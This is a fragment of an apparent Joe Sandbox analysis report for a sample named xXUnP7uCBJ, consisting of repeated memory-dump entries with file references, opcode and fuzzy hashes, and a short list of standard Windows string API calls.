                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                              • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98